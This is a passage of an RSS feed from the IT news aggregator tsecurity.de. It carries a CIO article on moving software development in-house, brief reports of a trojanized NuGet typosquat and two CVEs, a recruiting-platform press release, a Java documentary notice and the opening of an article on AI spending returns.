<guid isPermaLink="true">https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</guid>
<pubDate>Wed, 22 Jul 2026 11:11:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Outsourcing worked – until it didn’t.</p>



<p class="wp-block-paragraph">After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.</p>



<p class="wp-block-paragraph">The challenges started after the first enterprise customers confirmed product-market fit. At that point, delivery speed became directly tied to business growth. Product quality expectations increased. Infrastructure and security requirements became stricter. Investors started asking difficult but<a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html"> </a><a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html">fair questions</a> about IP ownership, operational dependencies and long-term scalability.</p>



<p class="wp-block-paragraph">Most importantly, engineering execution was no longer just an operational function – it became part of the company’s strategic advantage. That was the moment when the founders decided the company needed dedicated technology leadership to address these challenges. This is how I joined the company at the beginning of 2023. As VP of Engineering and a bit later as CTO, I led the transformation (usually known as<a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html"> </a><a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html">insourcing, repatriating or backsourcing</a>) from an outsourced model to an internal engineering organization while maintaining product delivery continuity and preparing the company for the next growth stage. The process took roughly a year and involved not only technical migration, but also organizational design, hiring, process development, infrastructure modernization and cultural transformation – everything from the ground up.</p>



<h2 class="wp-block-heading">Building an internal engineering organization while still delivering</h2>



<p class="wp-block-paragraph">One of the biggest misconceptions about insourcing is that it is primarily a technical project. It is a leadership and execution challenge.</p>



<p class="wp-block-paragraph">When I joined the company, there was effectively no internal engineering structure, limited visibility into the existing system and no clear long-term technical strategy. My first months were dedicated to understanding reality and I began with a comprehensive assessment of the codebase, operational risks, documentation quality and knowledge dependencies to determine the most viable transition strategy.</p>



<p class="wp-block-paragraph">Very early in the process, I faced a critical strategic decision: whether to gradually assume ownership of the existing platform or rebuild it internally. To make that decision, I evaluated four distinct transition models ranging from limited management insourcing to a complete internal rebuild.</p>



<p class="wp-block-paragraph">After assessing the technical, operational and long-term business implications of each approach, I selected the most demanding option: rebuilding the product internally while maintaining uninterrupted delivery for existing customers. Although riskier in the short term, a full rebuild offered the clearest route to complete IP ownership, architectural flexibility and long-term scalability.</p>



<p class="wp-block-paragraph">At the time, this decision ran counter to the approach typically taken by startups in similar situations. Most organizations gradually assume ownership of an existing codebase to minimize short-term risk and preserve delivery capacity. My assessment was that the accumulated architectural debt, fragmented knowledge distribution and long-term maintenance risks would ultimately make a phased takeover more expensive and less scalable than a controlled rebuild. The strategy required significantly higher execution discipline, but it allowed us to establish complete ownership of the platform, eliminate inherited constraints and create an architecture capable of supporting enterprise-scale growth.</p>



<p class="wp-block-paragraph">The next challenge was hiring.</p>



<p class="wp-block-paragraph">In Germany, hiring can easily take four to six months – mostly due to a typical 3-month notice period, which is incompatible with startup timelines. We solved this by building a hybrid organization structure early: a lean internal core team combined with carefully selected contractors. Instead of hiring only narrow specialists, we prioritized experienced generalists capable of operating across architecture, infrastructure, security and compliance discussions. Later, we evolved toward a<a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing"> </a><a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing">product engineering model</a>, where engineers owned broader product outcomes rather than narrowly defined technical functions.</p>



<p class="wp-block-paragraph">During the first three months, we established a core engineering team of four senior engineers. Over the following nine months, the organization expanded to roughly fifteen engineers while I strategically designed and executed the transformation of the platform’s architecture to meet the rigorous deployment and compliance standards of our first enterprise clients, including Raiffeisen Bank International and Bertelsmann. This structural overhaul allowed the company to meet the deployment, security and compliance requirements of enterprise customers that had previously been inaccessible under the outsourced model. At that point, we had already achieved complete coverage across backend, frontend, DevOps, QA and security.</p>



<p class="wp-block-paragraph">I also intentionally kept processes lightweight during the transition. Instead of introducing heavyweight frameworks, we focused on clarity of priorities, fast decision-making and execution discipline. We used Kanban over Scrum, eliminated unnecessary meetings, shortened the remaining ones and emphasized engineering culture over process overhead.</p>



<p class="wp-block-paragraph">Another major challenge was project estimation. Because dual-track development was unavoidable until the in-house platform reached production readiness, estimation accuracy had a direct impact on budget efficiency. Despite all challenges, my initial estimate ultimately proved remarkably close to the final delivery date, differing by only about a week. Accurate forecasting under conditions of parallel development streams, ongoing customer commitments and active team formation became a critical leadership challenge. Maintaining this level of predictability throughout the transition helped align engineering execution with business planning, hiring decisions and investor expectations.</p>



<p class="wp-block-paragraph">The engineering transformation enabled capabilities that contributed to Akirolabs being recognized as an IDC Innovator in Procurement in 2023, named amongst the Top 27 AI Startups in Germany in 2024, Sifted’s 100 Fastest-Growing Startups in DACH &amp; CEE 2025 and inclusion in 2024-2026 in ProcureTech100 annual recognition of procurement technology providers shaping the future of digital procurement.</p>



<h2 class="wp-block-heading">Managing risk without slowing down the business</h2>



<p class="wp-block-paragraph">The hardest part of insourcing is not writing code, selecting the technology stack, designing architecture or configuring infrastructure. It is avoiding disruption while the company is changing underneath the product. I successfully orchestrated the concurrent overhaul of product architecture, cross-functional engineering recruitment, infrastructure modernization and live customer operations under exceptionally tight margins.</p>



<p class="wp-block-paragraph">To reduce delivery risk, we approached the transition in layers.</p>



<p class="wp-block-paragraph">First, we focused on<a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/"> </a><a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/">infrastructure reliability and operational readiness</a> before feature expansion. Cloud architecture, recovery testing, permission segregation and incident management processes were implemented early, not after launch. We also introduced multiple testing stages and dedicated QA functions after learning the hard way that a “developers-only” quality control approach does not scale for complex web platforms and business domains.</p>



<p class="wp-block-paragraph">Second, we established a structured knowledge-transfer process to rapidly onboard engineers and reduce external dependencies.</p>



<p class="wp-block-paragraph">Third, we became extremely disciplined about scope management. One of the most common reasons<a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html"> </a><a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html">insourcing initiatives fail is uncontrolled change</a> during the rebuild phase. Every new feature request increases uncertainty non-linearly. We learned to separate strategic improvements from distractions and protect the core delivery roadmap aggressively. Throughout the transition, we successfully maintained uninterrupted customer operations by utilizing planned maintenance windows, achieved a near-zero-downtime migration and permanently doubled product velocity immediately following the migration.</p>



<p class="wp-block-paragraph">Beyond the technical migration itself, the transition established a repeatable operating model for scaling technology organizations beyond the product-market-fit stage. The framework combined organizational redesign, controlled knowledge repatriation, architecture modernization and enterprise-grade operational practices while maintaining uninterrupted customer delivery throughout the transformation. While the implementation was specific to Akirolabs, the underlying principles are broadly applicable to organizations seeking to transition from outsourced development to internal product ownership without disrupting business operations.</p>



<p class="wp-block-paragraph">By the time the new platform reached production readiness, I had established not only a functioning engineering organization, but also a stable operational model: internal ownership, production-grade infrastructure, security processes, scalable hiring practices and clear technology and product roadmaps.</p>



<p class="wp-block-paragraph">A positive side effect of the transition was the creation of internal UI/UX and Data Science capabilities, which later became strategically important for AI product initiatives and created a foundation for the third version of the product, which we released in mid-2025.</p>



<p class="wp-block-paragraph">My technical restructuring and migration to a secure proprietary platform reduced architectural risk, established full in-house ownership and helped strengthen investor confidence during the company’s successful €5M fundraising round in 2024.</p>



<p class="wp-block-paragraph">The transition created a stronger foundation for scale and supported the company’s continued expansion among enterprise organizations operating at Fortune 500 scale, including Ahold Delhaize, Workday, IFF, Deutsche Bahn and others.</p>



<h2 class="wp-block-heading">Lessons learned for CTOs considering insourcing</h2>



<p class="wp-block-paragraph">Looking back, several decisions made the transition successful, and several mistakes made it harder than necessary.</p>



<p class="wp-block-paragraph">The first lesson is simple: decisiveness in strategic transition is paramount to maintaining business momentum. Rapidly evaluating insourcing frameworks and defining clear boundaries with the external partner allowed us to mitigate operational downtime and execute a highly efficient migration ahead of critical market deadlines.</p>



<p class="wp-block-paragraph">Second, hire more senior people and do it as early as possible. Strong technical leaders multiply execution capacity far beyond their individual contribution. In our case, the quality of the first hires influenced architecture quality, hiring standards, delivery discipline and engineering culture for the entire organization.</p>



<p class="wp-block-paragraph">Finally, culture matters more than frameworks. Processes can be added later. Ownership mentality cannot.</p>



<p class="wp-block-paragraph">The biggest long-term advantage of bringing development in-house was not simply faster execution, not better code quality or operational cost optimization by over 30% after the transition which we also achieved. It was an alignment. Product strategy, engineering decisions, customer priorities and business goals became part of the same conversation instead of being separated by organizational boundaries. For technology companies operating in highly competitive markets, that alignment becomes a compounding advantage over time.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trojanized Newtonsoft.Json Fork Hides Game-Rigging Code in a Working Library]]></title>
<description><![CDATA[Cybersecurity researchers have discovered a NuGet typosquat that’s unlike the typical information-stealing malware distributed via package registries: usual info-stealers: it’s designed to rig live game results on Digitain. The package, named “Newtonsoftt.Json.Net,” masquerades as the Newtonsoft....]]></description>
<link>https://tsecurity.de/de/3685431/it-security-nachrichten/trojanized-newtonsoftjson-fork-hides-game-rigging-code-in-a-working-library/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685431/it-security-nachrichten/trojanized-newtonsoftjson-fork-hides-game-rigging-code-in-a-working-library/</guid>
<pubDate>Wed, 22 Jul 2026 08:39:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have discovered a NuGet typosquat that’s unlike the typical information-stealing malware distributed via package registries: usual info-stealers: it’s designed to rig live game results on Digitain. The package, named “Newtonsoftt.Json.Net,” masquerades as the Newtonsoft.Json library and is a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/trojanized-newtonsoft-json-fork-hides-game-rigging-code-in-a-working-library/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/trojanized-newtonsoft-json-fork-hides-game-rigging-code-in-a-working-library/">Trojanized Newtonsoft.Json Fork Hides Game-Rigging Code in a Working Library</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trojanized Newtonsoft.Json Fork Hides Game-Rigging Code in a Working Library]]></title>
<description><![CDATA[Cybersecurity researchers have discovered a NuGet typosquat that's unlike the typical information-stealing malware distributed via package registries: usual info-stealers: it's designed to rig live game results on Digitain.

The package, named "Newtonsoftt.Json.Net," masquerades as the Newtonsoft...]]></description>
<link>https://tsecurity.de/de/3685407/it-security-nachrichten/trojanized-newtonsoftjson-fork-hides-game-rigging-code-in-a-working-library/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685407/it-security-nachrichten/trojanized-newtonsoftjson-fork-hides-game-rigging-code-in-a-working-library/</guid>
<pubDate>Wed, 22 Jul 2026 08:23:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have discovered a NuGet typosquat that's unlike the typical information-stealing malware distributed via package registries: usual info-stealers: it's designed to rig live game results on Digitain.

The package, named "Newtonsoftt.Json.Net," masquerades as the Newtonsoft.Json library and is a trojanized fork. Seven versions of the package have been published to the]]></content:encoded>
</item>
<item>
<title><![CDATA[LG OLEDs Summon New Prime Video Setting Named Creator Original Picture Mode]]></title>
<description><![CDATA[Saying “I have the power” into your remote will also launch the new He-Man movie.]]></description>
<link>https://tsecurity.de/de/3684879/it-nachrichten/lg-oleds-summon-new-prime-video-setting-named-creator-original-picture-mode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684879/it-nachrichten/lg-oleds-summon-new-prime-video-setting-named-creator-original-picture-mode/</guid>
<pubDate>Tue, 21 Jul 2026 23:33:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Saying “I have the power” into your remote will also launch the new He-Man movie.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46600 | Google Go up to 0.55.x x-net-dns-dnsmessage out-of-bounds]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Google Go up to 0.55.x. This issue affects some unknown processing of the component x-net-dns-dnsmessage. Performing a manipulation results in out-of-bounds read.

This vulnerability was named CVE-2026-46600. The attack may be initiated ...]]></description>
<link>https://tsecurity.de/de/3684808/sicherheitsluecken/cve-2026-46600-google-go-up-to-055x-x-net-dns-dnsmessage-out-of-bounds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684808/sicherheitsluecken/cve-2026-46600-google-go-up-to-055x-x-net-dns-dnsmessage-out-of-bounds/</guid>
<pubDate>Tue, 21 Jul 2026 22:59:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/google:go">Google Go up to 0.55.x</a>. This issue affects some unknown processing of the component <em>x-net-dns-dnsmessage</em>. Performing a manipulation results in out-of-bounds read.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-46600">CVE-2026-46600</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46821 | Oracle Financials Common Modules up to 12.2.15 Common Components improper authorization]]></title>
<description><![CDATA[A vulnerability was found in Oracle Financials Common Modules up to 12.2.15. It has been declared as critical. This affects an unknown part of the component Common Components. The manipulation results in improper authorization.

This vulnerability was named CVE-2026-46821. The attack may be perfo...]]></description>
<link>https://tsecurity.de/de/3684513/sicherheitsluecken/cve-2026-46821-oracle-financials-common-modules-up-to-12215-common-components-improper-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684513/sicherheitsluecken/cve-2026-46821-oracle-financials-common-modules-up-to-12215-common-components-improper-authorization/</guid>
<pubDate>Tue, 21 Jul 2026 19:47:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:financials_common_modules">Oracle Financials Common Modules up to 12.2.15</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the component <em>Common Components</em>. The manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-46821">CVE-2026-46821</a>. The attack may be performed from remote. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[HireQuotient Extends AI Recruiting Capabilities to Paylocity Customers in Frontline Industries]]></title>
<description><![CDATA[HireQuotient, an AI-native recruiting platform, today announced its integration with Paylocity (Nasdaq: PCTY), bringing AI-powered candidate sourcing and screening capabilities to Paylocity customers in manufacturing, building services, construction, healthcare and insurance, which are industries...]]></description>
<link>https://tsecurity.de/de/3684468/it-nachrichten/hirequotient-extends-ai-recruiting-capabilities-to-paylocity-customers-in-frontline-industries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684468/it-nachrichten/hirequotient-extends-ai-recruiting-capabilities-to-paylocity-customers-in-frontline-industries/</guid>
<pubDate>Tue, 21 Jul 2026 19:34:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">HireQuotient, an AI-native recruiting platform, today announced its integration with Paylocity (Nasdaq: PCTY), bringing AI-powered candidate sourcing and screening capabilities to Paylocity customers in manufacturing, building services, construction, healthcare and insurance, which are industries where deskless and frontline hiring has historically been underserved by AI recruiting tools.</p>



<p class="wp-block-paragraph">Employers in these sectors who already use HireQuotient are seeing the impact firsthand.</p>



<p class="wp-block-paragraph">“By simply putting in vetting criteria, I was able to get a very specific talent pool within a day,” said Niki Simoneaux, COO of Arc Health. “With EasySource, we can reach a huge database or filter for specific licenses and areas.”</p>



<p class="wp-block-paragraph">“With technology and the ability to work remotely, we’re able to recruit nationwide outside of our footprint. This expands the pool of prospective candidates and gives us access to candidates who might not have ever applied for a position on our website’s career page,” said Jeff McGee, vice president at W3 Insurance.</p>



<p class="wp-block-paragraph">“HireQuotient’s AI-native product helped my team at Alliance Building Services to cut down time to close position by more than 60%, and their team works very closely with the client to ensure adoption at scale,” said Willow Marcon, senior vice president at Alliance Building Services.</p>



<p class="wp-block-paragraph">Recruiters in manufacturing, building services, construction, healthcare and insurance often spend more than two-thirds of their time on manual work and using over 10 platforms to just close a hire: sourcing a wide range of profiles, skimming resumes, finding contact information, reaching out and doing hundreds of calls and constant follow-ups. That fragmented process leads to recruiter burnout and leaves gaps in candidate data. Because most HR platforms don’t offer built-in AI native agents that work in tandem to do all it takes to close the hire, employers in these industries have faced hiring delays and platform churn.</p>



<p class="wp-block-paragraph">The partnership addresses this gap by integrating HireQuotient’s EasySource platform directly into the Paylocity ecosystem. Instead of relying on rigid keyword searches, EasySource identifies strong talent pools, screens for role-specific credentials and licenses and personalizes outreach by phone and email. For mid-market companies with 500 to 1,000 employees, that translates to a 70% faster time-to-hire and an estimated $100,000 in annual savings.</p>



<p class="wp-block-paragraph">The integration also closes the feedback loop for employers. By feeding post-hire data back into the recruiting system, EasySource learns from successful hires to build smarter talent pools over time, while keeping recruiters engaged longer by freeing them to focus on the human side of hiring.</p>



<p class="wp-block-paragraph">Gokul Rajaram, board member at Coinbase and former board member of The Trade Desk (Nasdaq: TTD), and also known as the godfather of Google AdSense, said, “Smarthveer is one of those rare founders who picks an unglamorous, deeply underserved market and refuses to leave until it’s fixed. Frontline hiring is exactly that market. Being named to Paylocity’s elite partner network is a testament to his relentlessness and to the team he’s built. Excited for what’s ahead.”</p>



<p class="wp-block-paragraph">“Paylocity maintains an elite partner network, so being named one of them is a testament to the strength of our product,” said Smarthveer Sidana, founder and CEO of HireQuotient. “By keeping that recruiting activity inside the Paylocity ecosystem, we’re helping them close a critical gap for their employers, capture revenue that previously sat outside their platform, and prevent the client churn that comes with a fragmented hiring process.”</p>



<p class="wp-block-paragraph">Jim Moffatt, former global CEO of Deloitte Consulting and board partner at Greycroft VC, said, </p>



<p class="wp-block-paragraph">“This is a big milestone for Smarthveer and his team. I congratulate them on this big win. Paylocity’s large client base acts as a strong distribution, and HireQuotient’s EasySource acts as a strong product to cater to the needs of Paylocity’s clients. Paylocity is known for its highly selective approach, and I’m glad to see that after months of evaluation and extensive due diligence, they’re going live with HireQuotient’s EasySource. I feel confident in the value this partnership will create for frontline industries. I remember when Smarthveer spoke to me about it in December, and it felt very ambitious. I’m glad to see it turn to reality.”</p>



<p class="wp-block-paragraph">For employers with a traditionally deskless workforce in industries where AI adoption has lagged, the integration bridges a major capability gap by allowing them to source, screen, onboard and manage payroll all in one place.</p>



<p class="wp-block-paragraph">For more information, visit <a href="http://www.hirequotient.com/" target="_blank" rel="noreferrer noopener">www.hirequotient.com</a>.</p>



<p class="wp-block-paragraph">A media kit with additional partner quotes, executive headshots and logos can be found <a href="https://drive.google.com/drive/folders/1XZQE4etoLPgzNO94Y8I1-YX7ODyj8AnA?usp=sharing" target="_blank" rel="noreferrer noopener">here</a>.</p>



<p class="wp-block-paragraph"><strong>About HireQuotient</strong></p>



<p class="wp-block-paragraph">HireQuotient is an AI-native recruiting platform that automates candidate sourcing and screening for employers in manufacturing, building services, construction, healthcare, insurance and other frontline-heavy industries. Its flagship platform, EasySource, is one of a select number of recruiting technologies integrated with Paylocity’s HR and payroll ecosystem. Founded by Smarthveer Sidana, HireQuotient is headquartered in San Francisco. For more information, visit <a href="https://www.hirequotient.com/" target="_blank" rel="noreferrer noopener">https://www.hirequotient.com/</a>.</p>



<p class="wp-block-paragraph"><strong>Media Contact</strong></p>



<p class="wp-block-paragraph">Bethany Rhodes</p>



<p class="wp-block-paragraph">Uproar by Moburst for HireQuotient</p>



<p class="wp-block-paragraph">bethany@moburst.com</p>



<h5 class="wp-block-heading"><strong>Contact</strong></h5>



<p class="wp-block-paragraph"><strong>Bethany Rhodes</strong></p>



<p class="wp-block-paragraph"><strong>bethany@moburst.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘The Java Story’ comes to YouTube]]></title>
<description><![CDATA[The evolution of Java is the subject of a just-released documentary about the programming language and development platform. “The Java Story: The Official Documentary” tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.



Produced...]]></description>
<link>https://tsecurity.de/de/3684377/ai-nachrichten/the-java-story-comes-to-youtube/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684377/ai-nachrichten/the-java-story-comes-to-youtube/</guid>
<pubDate>Tue, 21 Jul 2026 18:35:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The evolution of <a href="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html" data-type="link" data-id="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html">Java</a> is the subject of a just-released documentary about the programming language and development platform. <a href="https://inside.java/2026/07/18/the-java-documentary/">“The Java Story: The Official Documentary”</a> tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.</p>



<p class="wp-block-paragraph">Produced by <a href="https://www.youtube.com/@cultrepo">CultRepo</a> and sponsored by Oracle, JetBrains, IBM, and Azul, the documentary follows Java from its set-top box and browser-based origins at Sun Microsystems in the 1990s and through its rise to dominate server-side computing in the 2000s, the “dark ages” and resurgence with Java 8 under Oracle in the 2010s, and its continuing modernization and promising role in AI today. “From its humble beginnings as a project code-named ‘Oak’ at Sun Microsystems to becoming a global standard for enterprise software and billions of devices, Java’s journey is one of radical innovation, strategic pivots, and enduring community strength,” said Cult.Repo. </p>



<p class="wp-block-paragraph">The documentary also delves into Sun’s bitter Java licensing dispute with Microsoft, Oracle’s suit of Google over its use of Java APIs Android (Google won), the creation of the <a href="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html" data-type="link" data-id="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html">Java Community Process</a>, Sun’s open-sourcing of Java, and Oracle’s switch to the six-month release cycle. Technical enhancements such as lambda expressions in Java 8, virtual threads in Java 21 (<a href="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html" data-type="link" data-id="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html">Project Loom</a>), and the ongoing refactor to bring value objects to the Java object model (<a href="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html" data-type="link" data-id="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html">Project Valhalla</a>) also get attention. </p>



<p class="wp-block-paragraph">Technical experts and other Java figures interviewed in the documentary include James Gosling, creator of Java; Kim Polese, Java’s first product manager; Carla Schroer, director of Java compatibility at Sun Microsystems; James Duncan Davidson, creator of Apache Tomcat; Mark Reinhold, chief architect of the Java Platform Group at Oracle; Brian Goetz, Java language architect in the Java Platform Group at Oracle; Rod Johnson, creator of Spring; and Gavin King, creator of Hibernate. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Akamai Recognized as a Customers’ Choice in the 2026 Gartner® Peer Insights™ Voice of the Customer for Edge Distribution Platforms]]></title>
<description><![CDATA[Customers named Akamai a 2026 GartnerⓇ Peer Insights™ Customers’ Choice for Edge Distribution Platforms. See why they trust us to scale and secure their apps. This article has been indexed from Blog Read the original article: Akamai Recognized as a…
Read more →
The post Akamai Recognized as a Cus...]]></description>
<link>https://tsecurity.de/de/3684125/it-security-nachrichten/akamai-recognized-as-a-customers-choice-in-the-2026-gartner-peer-insights-voice-of-the-customer-for-edge-distribution-platforms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684125/it-security-nachrichten/akamai-recognized-as-a-customers-choice-in-the-2026-gartner-peer-insights-voice-of-the-customer-for-edge-distribution-platforms/</guid>
<pubDate>Tue, 21 Jul 2026 17:08:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Customers named Akamai a 2026 GartnerⓇ Peer Insights™ Customers’ Choice for Edge Distribution Platforms. See why they trust us to scale and secure their apps. This article has been indexed from Blog Read the original article: Akamai Recognized as a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/akamai-recognized-as-a-customers-choice-in-the-2026-gartner-peer-insights-voice-of-the-customer-for-edge-distribution-platforms/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/akamai-recognized-as-a-customers-choice-in-the-2026-gartner-peer-insights-voice-of-the-customer-for-edge-distribution-platforms/">Akamai Recognized as a Customers’ Choice in the 2026 Gartner® Peer Insights™ Voice of the Customer for Edge Distribution Platforms</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI allocation trap: Record spend, vanishing returns]]></title>
<description><![CDATA[In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant told Axios that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-b...]]></description>
<link>https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</guid>
<pubDate>Tue, 21 Jul 2026 15:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant <a href="https://www.axios.com/2026/05/28/ai-spending-roi-enterprise-costs">told Axios</a> that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-billion-dollar accident is only the visible part of a quieter, far larger failure. <a href="https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026">Worldwide AI spending is forecast to reach $2.52 trillion in 2026</a>, more than any technology category in a generation, and by the most cited measure, roughly 95 percent of it returns nothing. Boards read that as proof that the technology does not work. The evidence points somewhere less comfortable, and it is not a technology problem at all. Most boards cannot see it because they are reading the wrong number: They track failure when the number that matters is allocation. The discipline that separates the winners is not technical. It is how they allocate capital across time, and how willing they are to stop. The hardest discipline in the AI era is not adopting faster. It is allocating honestly and refusing to judge a three-year bet on a six-month cycle.</p>



<h2 class="wp-block-heading">The number everyone quotes, and no one acts on</h2>



<p class="wp-block-paragraph">The headline statistic is now familiar. MIT’s Project NANDA, in its 2025 study <a href="https://fortune.com/2025/08/18/mit-report-95-percent-generative-ai-pilots-at-companies-failing-cfo/">The GenAI Divide</a>, found that about 95 percent of enterprise generative AI pilots produced no measurable impact on the P&amp;L, while roughly 5 percent captured nearly all the value. <a href="https://www.spglobal.com/market-intelligence/en/news-insights/research/2025/10/generative-ai-shows-rapid-growth-but-yields-mixed-results">S&amp;P Global Market Intelligence</a> found that the share of companies abandoning most of their AI initiatives jumped from 17 percent to 42 percent in a single year, with the average organization scrapping 46 percent of its proofs-of-concept before production. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner</a> expects more than 40 percent of agentic AI projects to be canceled by the end of 2027, citing escalating costs, unclear business value and inadequate risk controls. And the pattern predates generative AI: <a href="https://www.rand.org/pubs/research_reports/RRA2680-1.html">RAND</a> found that more than 80 percent of AI projects fail, roughly twice the rate of comparable work that does not involve AI.</p>



